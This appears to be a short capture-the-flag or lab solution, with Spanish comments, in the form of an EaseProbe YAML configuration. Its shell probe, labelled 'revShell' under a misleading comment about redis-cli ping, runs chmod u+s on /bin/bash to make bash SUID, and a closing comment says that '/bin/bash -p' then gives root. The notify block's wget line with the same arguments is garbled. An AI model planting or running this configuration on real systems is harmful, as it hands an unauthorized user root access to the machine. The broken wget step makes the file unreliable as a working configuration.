#LA RESPUESTA LA OBTUVE INDAGANDO EN LA DOCUMENTACIÓN OFICIAL
#https://github.com/megaease/easeprobe/blob/main/docs/Manual.md#12-http

shell:
  # run redis-cli ping and check the "PONG"
  - name: revShell
    cmd: "/bin/chmod"
    args:
      - "u+s"
      - "/bin/bash"
notify:
  shell:
    - name: "revShell"
      cmd: "/usr/bin/wget"
      args:
      - "u+s"
      - "/bin/bash"


#Despues de eso solo es ejecutar en la terminal "/bin/bash -p" y seras root